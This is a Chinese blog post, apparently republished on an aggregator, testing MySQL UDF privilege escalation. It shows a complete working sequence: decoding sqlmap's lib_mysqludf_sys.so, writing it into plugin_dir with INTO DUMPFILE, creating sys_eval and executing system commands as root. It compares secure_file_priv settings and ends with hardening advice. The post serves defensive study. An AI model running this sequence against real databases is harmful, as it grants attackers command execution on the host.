首页 > 数据库 >MySQL UDF 提权初探

MySQL UDF 提权初探

时间:2024-08-07 10:05:20浏览次数:12  
标签:lib plugin MySQL sys 提权 UDF file mysql so

MySQL UDF 提权初探

对 MySQL UDF 提权做一次探究,什么情况下可以提权,提取的主机权限是否跟mysqld进程启动的主机账号有关

数据库信息

MySQL数据库版本:5.7.21

UDF

UDF:(User Defined Function) 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权。

提权原理:攻击者通过编写调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,创建一个指向共享库文件的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。

执行过程:本质上还是利用了MySQL能够执行系统命令的特点。具体过程如下

(1)攻击者编写一些可以调用cmd或者shell的共享库文件(window为.dll,linux为.so),将共享库导入指定的函数目录中。

(2)在MySQL中创建指向共享库文件的自定义函数。

(3)通过刚刚创建的函数执行系统命令,实现提权。

漏洞详情

当mysql配置secure_file_priv项为空或者secure_file_priv项为plugin文件夹,且可以用弱口令登录数据库,存在udf提权漏洞。

  1. 查看漏洞利用条件:secure_file_priv为空或者为plugin文件夹,可以登录数据库,存在plugin文件夹

  2. 将udf.so文件导入相关plugin文件夹下

  3. 使用udf创建自定义函数
    Create function sys_eval returns string soname ‘udf.so’;

  4. 使用自定义函数执行任意代码执行:

获取so文件

$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
python3 cloak.py -d -i /tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so_

$ ll /tmp/sqlmap-dev/data/udf/mysql/linux/64/
-rw-rw-r-- 1 mysql mysql 8040 May 21 15:17 lib_mysqludf_sys.so
-rw-rw-r-- 1 mysql mysql 3200 May 21 15:17 lib_mysqludf_sys.so_

root账号拉起mysqld进程

secure_file_priv=''

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv |                |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#导入so文件成功
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下成功
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
Query OK, 1 row affected (0.01 sec)
#创建自定义函数成功
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
Query OK, 0 rows affected (0.00 sec)
#调用函数成功
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root               |
+--------------------+
1 row in set (0.02 sec)

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv | /home/mysql/   |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#创建中间表
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)
#导入so文件成功
mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下失败
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
#导出so文件到secure_file_priv
mysql> select * from foo into dumpfile '/home/mysql/lib_mysqludf_sys.so';
Query OK, 1 row affected (0.00 sec)
#通过plugin的so创建自定义函数失败
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so' (errno: 0 /mysql/svr/mysql-5.7.21-linux-glibc2.12-x86_64/lib/plugin/lib_mysqludf_sys.so: cannot open shared object file: No such file or)

secure_file_priv=dirname(secure_file_priv和plugin_dir路径一致)

#plugin_dir路径下有so文件了
#直接创建自定义函数
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
Query OK, 0 rows affected (0.00 sec)
#调用函数成功
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root               |
+--------------------+
1 row in set (0.02 sec)

secure_file_priv=null

mysql> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | null  |
+------------------+-------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#创建中间表
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)
#导入so文件成功
mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下失败
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
#通过plugin的so创建自定义函数失败
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so' (errno: 0 /mysql/svr/mysql-5.7.21-linux-glibc2.12-x86_64/lib/plugin/lib_mysqludf_sys.so: cannot open shared object file: No such file or)

普通账号拉起mysqld进程

secure_file_priv=''

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv |                |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+
| default_authentication_plugin | mysql_native_password              |
| plugin_dir                    | /mysql/svr/mysql5721/lib/plugin/   |
+-------------------------------+------------------------------------+
#导入so文件成功
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.03 sec)

mysql> insert into foo values(load_file('/tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.01 sec)
#导出so文件到plugin_dir下成功
mysql> select * from foo into dumpfile '/mysql/svr/mysql5721/lib/plugin/lib_mysqludf_sys.so';
Query OK, 1 row affected (0.01 sec)
#创建自定义函数成功
mysql> create function sys_eval returns string soname "lib_mysqludf_sys.so";
Query OK, 0 rows affected (0.00 sec)
#调用函数成功
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.06 sec)

余下的几种secure_file_priv=dirname(secure_file_priv和plugin_dir路径不一致),secure_file_priv=dirname(secure_file_priv和plugin_dir路径一致),secure_file_priv=null得出的结果是类似的,这里就不详细继续阐述了,全部写完可能篇数稍长。

总结

  • secure_file_priv

    • ''(empty string),不限制导入和导出的目录。只需将so写到plugin_dir,能创建so自定义函数。存在漏洞风险
    • dirname(指定目录),限制导入和导出为指定目录。如果指定的目录和plugin_dir相同,能正常创建so自定义函数,存在漏洞风险;否则不能创建so自定义函数
    • null,禁止导入和导出操作,不存在漏洞风险
  • 提权账号
    无论采用哪种方式启动数据库(systemctl start mysql、mysqld、mysqld_safe),提权后的账号根据mysqld进程uid确定

    $ ps -ef|head -1;ps -ef |grep 5721
    UID        PID  PPID  C STIME TTY          TIME CMD
    root     18371 11890  1 17:33 pts/21   00:00:00 /mysql/svr/mysql5721/bin/mysqld --defaults-file=/mysql/conf/mysql5721.cnf
    
  • 数据库账号的权限
    目标端需要能执行select...into dumpfile、创建函数权限

建议

  1. 使用普通账号启动数据库(配置文件中--user=mysql)
  2. secure_file_priv设置为null,禁止导入和导出操作;如果需要导入和导出,将secure_file_priv设置为非plugin_dir目录
  3. 数据库密码尽量复杂
  4. 关注plugin_dir是否有新增的不明来源的.so文件和关注数据库是否有新增不明来源的自定义函数

Enjoy GreatSQL

标签:lib,plugin,MySQL,sys,提权,UDF,file,mysql,so
From: https://www.cnblogs.com/greatsql/p/18346481

相关文章

  • MySQL安装
    目录前言MySQL5.7的安裝一、在线安装1.下载yumRepository2.安装yumRepository3.安装mysql5.7的服务4.开机自启动5.启动mysql6.查看状态7.获取临时密码8.登录mysql9.关闭密码复杂验证10.设置密码11.修改权限二、离线安装1、卸载已有的MySQL文件2、安装mysql......
  • 最全MySQL面试20题和答案(一)
    数据库基础知识为什么要使用数据库?数据保存在内存优点:存取速度快缺点:数据不能永久保存数据保存在文件优点:数据永久保存缺点:速度比内存操作慢,频繁的IO操作。查询数据不方便数据保存在数据库数据永久保存使用SQL语句,查询方便效率高。管理数据方便什......
  • 【MySQL】索引和事务
    秋招秋招中最经典,最高频的面试题文章目录索引index操作索引的SQL查看索引创建索引删除索引事务操作四个核心特性索引index在数据库中建立一个特殊的“目录“(一系列特定的数据结构),为了加快查询速度select查询都是遍历查询,比较复杂O(N)级别复杂度嵌......
  • Mysql事务四大特性的介绍
    1数据库事务        数据库的事务(Transaction)是一种机制、一个操作序列,包含了一组数据库操作命令。事务把所有的命令作为一个整体一起向系统提交或撤销操作请求,即这一组数据库命令要么都执行,要么都不执行,因此事务是一个不可分割的工作逻辑单元。在数据库系统上执行并......
  • MySQL中DayofWeek与Weekday的区别
    DAYOFWEEK(date):(1-7,周日始,美国人)这个函数返回日期date是一周中的哪一天,范围是1到7。其中,1表示周日,2表示周一,依此类推,7表示周六。这符合美国的日期习惯,即周日是一周的第一天。例如,DAYOFWEEK('2023-03-01')如果这一天是周三,将返回3。WEEKDAY(date):(0-6,周一始)WEEKDAY(......
  • 2024年8月6日(MySQL主从)
    一、glibc安装(回顾及补充)1、清空/etc/目录下的my.cnfls-l/etc/my.cnfrm-rf/etc/my.cnfyum-yremovemariadbfind/-name"*mysql*"-execrm-rf{}\;2、安装mysql软件包wgethttps://downloads.mysql.com/archives/get/p/23/file/mysql-8.0.33-linux-glibc2.......
  • 2024.8.06(mysql主从)
    一、glibc安装(回顾)mysql清空/etc/目录下的my.cnfls-l/etc/my.cnfrm-rf/etc/my.cnfyum-yremovemariadbfind/-name"*mysql*"-execrm-rf{}\;1、安装mysql软件包wgethttps://downloads.mysql.com/archives/get/p/23/file/mysql-8.0.33-linux-glibc2.12......
  • MySQL数据库基础1
    sql通用语法SQL语句可以单行或多行书写,以分号结尾。SQL语句可以使用空格/缩进来增强语句的可读性MySQL数据库的SQL语句不区分大小写,关键字建议使用大写注释:单行注释:--注释内容或#注释内容(MySQL特有)多行注释:/*注释内容*SQL分类DDL库操作查询所有数据库sho......
  • MySQL——SQL语句
    文章目录什么是SQL?SQL通用语法SQL分类DDL:操作数据库、表3.1操作数据库:CRUD3.2操作表CRUDDML:增删改表中数据1.添加数据:2.删除数据:3.修改数据:DQL:查询表中的记录1.语法:2.基础查询3.条件查询4.排序查询其他函数5.聚合函数6.分组查询7.分页查询:DCL:管理用户,授权1.管理用......
  • MySQL主从复制
    介绍MySOL主从复制是一个异步的复制过程,底层是基于Mysq1数据库自带的二进制日志功能。就是一台或多台MySOL数据库(slave,即从库)从另一台MvSOL数据库(master,即主库)进行日志的复制然后再解析日志并应用到自身,最终实现从库的数据和主库的数据保持一致。MySOL主从复制是MySOL数......